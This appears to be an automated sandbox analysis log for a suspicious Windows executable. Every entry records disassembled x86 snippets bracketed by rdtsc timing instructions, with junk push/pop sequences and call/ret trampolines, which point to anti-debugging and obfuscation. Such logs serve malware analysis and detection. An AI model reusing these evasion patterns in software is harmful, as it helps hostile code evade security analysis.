                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BFBA second address: D4BFC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F08C second address: D4F097 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D505D0 second address: D505D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F7A6 second address: D4F7AB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F7AB second address: D4F7CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jmp 00007FDA2529D374h 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F7CB second address: D4F7D5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDA252A168Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F7D5 second address: D4F854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov edi, ebx 0x00000009 push dword ptr fs:[00000000h] 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FDA2529D368h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a xor dword ptr [ebp+12472583h], ecx 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007FDA2529D368h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000018h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 mov eax, dword ptr [ebp+122D0441h] 0x00000057 or ebx, 0B14AF9Ah 0x0000005d push FFFFFFFFh 0x0000005f mov edi, dword ptr [ebp+122D2A1Ah] 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 jns 00007FDA2529D36Ch 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D525F8 second address: D52601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D52601 second address: D52605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D52605 second address: D52609 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5187E second address: D51883 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D52609 second address: D52624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jmp 00007FDA252A168Fh 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51883 second address: D51889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5372F second address: D537B8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 mov dword ptr [ebp+122D1D49h], eax 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007FDA252A1688h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 jnp 00007FDA252A1687h 0x00000038 cld 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edx 0x0000003e call 00007FDA252A1688h 0x00000043 pop edx 0x00000044 mov dword ptr [esp+04h], edx 0x00000048 add dword ptr [esp+04h], 00000019h 0x00000050 inc edx 0x00000051 push edx 0x00000052 ret 0x00000053 pop edx 0x00000054 ret 0x00000055 mov edi, ecx 0x00000057 mov dword ptr [ebp+122D30DEh], esi 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FDA252A1698h 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0D795 second address: D0D7E2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FDA2529D37Eh 0x00000008 jmp 00007FDA2529D379h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDA2529D36Fh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55D55 second address: D55DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 mov dword ptr [esp], eax 0x0000000b call 00007FDA252A168Eh 0x00000010 mov di, E9E2h 0x00000014 pop edi 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FDA252A1688h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 jmp 00007FDA252A168Ah 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007FDA252A1688h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 00000017h 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 mov dword ptr [ebp+122D1FD5h], edi 0x00000058 xchg eax, esi 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FDA252A1697h 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56EDC second address: D56EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56EE0 second address: D56EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56EE6 second address: D56F50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sub dword ptr [ebp+1246BA29h], edx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007FDA2529D368h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b jmp 00007FDA2529D370h 0x00000030 push 00000000h 0x00000032 mov edi, eax 0x00000034 mov ebx, 0D1727C4h 0x00000039 xchg eax, esi 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d jmp 00007FDA2529D379h 0x00000042 pop eax 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56F50 second address: D56F56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57097 second address: D5709C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58DE5 second address: D58DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58116 second address: D58140 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDA2529D368h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b js 00007FDA2529D383h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FDA2529D375h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58DE9 second address: D58E2D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDA252A1686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FDA252A1696h 0x0000000f popad 0x00000010 nop 0x00000011 pushad 0x00000012 clc 0x00000013 pushad 0x00000014 mov bx, si 0x00000017 popad 0x00000018 popad 0x00000019 xor edi, dword ptr [ebp+122D2AE2h] 0x0000001f push 00000000h 0x00000021 sub bx, 9631h 0x00000026 push 00000000h 0x00000028 mov dword ptr [ebp+122D34EBh], edi 0x0000002e push eax 0x0000002f pushad 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58E2D second address: D58E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58E36 second address: D58E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58E3A second address: D58E3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59EEE second address: D59EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59EF3 second address: D59EF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59EF8 second address: D59F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FDA252A1686h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jnc 00007FDA252A168Ah 0x00000014 nop 0x00000015 mov bh, ch 0x00000017 and di, 7B46h 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f mov di, E597h 0x00000023 pop edi 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push eax 0x00000029 call 00007FDA252A1688h 0x0000002e pop eax 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 add dword ptr [esp+04h], 0000001Ah 0x0000003b inc eax 0x0000003c push eax 0x0000003d ret 0x0000003e pop eax 0x0000003f ret 0x00000040 add dword ptr [ebp+122D37C8h], eax 0x00000046 xchg eax, esi 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FDA252A1695h 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59F64 second address: D59F80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA2529D378h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59F80 second address: D59F85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59F85 second address: D59F8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59F8B second address: D59F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jnc 00007FDA252A1686h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A15B second address: D5A15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C005 second address: D5C009 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C009 second address: D5C017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FDA2529D366h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C017 second address: D5C0CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FDA252A1696h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FDA252A1688h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 jmp 00007FDA252A1697h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edx 0x00000032 call 00007FDA252A1688h 0x00000037 pop edx 0x00000038 mov dword ptr [esp+04h], edx 0x0000003c add dword ptr [esp+04h], 00000017h 0x00000044 inc edx 0x00000045 push edx 0x00000046 ret 0x00000047 pop edx 0x00000048 ret 0x00000049 sub dword ptr [ebp+12473959h], edx 0x0000004f push 00000000h 0x00000051 call 00007FDA252A168Fh 0x00000056 jmp 00007FDA252A168Ah 0x0000005b pop ebx 0x0000005c push eax 0x0000005d jg 00007FDA252A16A1h 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007FDA252A168Fh 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C0CC second address: D5C0D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D1C1 second address: D5D1F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA252A1695h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDA252A1697h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D1F5 second address: D5D1FF instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDA2529D36Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C21D second address: D5C227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FDA252A1686h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C227 second address: D5C2D8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jns 00007FDA2529D36Ah 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FDA2529D368h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a clc 0x0000002b push dword ptr fs:[00000000h] 0x00000032 mov edi, dword ptr [ebp+122D1C00h] 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f cmc 0x00000040 mov dword ptr [ebp+122D2FF0h], esi 0x00000046 mov eax, dword ptr [ebp+122D16F9h] 0x0000004c call 00007FDA2529D36Ch 0x00000051 jmp 00007FDA2529D374h 0x00000056 pop edi 0x00000057 push FFFFFFFFh 0x00000059 jmp 00007FDA2529D36Fh 0x0000005e nop 0x0000005f jl 00007FDA2529D37Ch 0x00000065 jmp 00007FDA2529D376h 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d push edi 0x0000006e push esi 0x0000006f pop esi 0x00000070 pop edi 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D447 second address: D5D454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007FDA252A1686h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60136 second address: D601C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 stc 0x0000000a and edi, dword ptr [ebp+122D2B62h] 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007FDA2529D368h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D1C48h], eax 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e mov eax, dword ptr [ebp+122D1275h] 0x00000044 jmp 00007FDA2529D376h 0x00000049 push FFFFFFFFh 0x0000004b push 00000000h 0x0000004d push ecx 0x0000004e call 00007FDA2529D368h 0x00000053 pop ecx 0x00000054 mov dword ptr [esp+04h], ecx 0x00000058 add dword ptr [esp+04h], 0000001Bh 0x00000060 inc ecx 0x00000061 push ecx 0x00000062 ret 0x00000063 pop ecx 0x00000064 ret 0x00000065 push eax 0x00000066 push esi 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D601C0 second address: D601C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66E50 second address: D66E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66E56 second address: D66E60 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDA252A168Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D062 second address: D6D068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6E6B4 second address: D6E6BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6E6BD second address: D6E6C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6E6C3 second address: D6E6C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6FE29 second address: D6FE2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6FE2D second address: D6FE36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D749B1 second address: D749BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D749BA second address: D749BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D749BE second address: D749C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73EC0 second address: D73EDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDA252A1697h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73EDF second address: D73EE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73EE3 second address: D73EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73EE9 second address: D73F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FDA2529D36Eh 0x0000000c jbe 00007FDA2529D366h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 jl 00007FDA2529D366h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74078 second address: D74085 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDA252A1686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D741F7 second address: D741FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D741FD second address: D74203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74203 second address: D7422F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FDA2529D376h 0x0000000a jmp 00007FDA2529D36Ch 0x0000000f popad 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7422F second address: D74237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74516 second address: D74539 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FDA2529D377h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74539 second address: D7453F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7453F second address: D74568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FDA2529D372h 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push edx 0x00000018 pop edx 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74568 second address: D74583 instructions: 0x00000000 rdtsc 0x00000002 je 00007FDA252A1694h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D746CD second address: D746E7 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDA2529D36Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jng 00007FDA2529D366h 0x00000010 jl 00007FDA2529D36Eh 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7A8B8 second address: D7A8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7A8BC second address: D7A8D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA2529D370h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79390 second address: D7939E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FDA252A1686h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7939E second address: D793A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7A08B second address: D7A0B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FDA252A168Ah 0x00000011 jnc 00007FDA252A1686h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c jo 00007FDA252A1686h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7A5F4 second address: D7A5F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
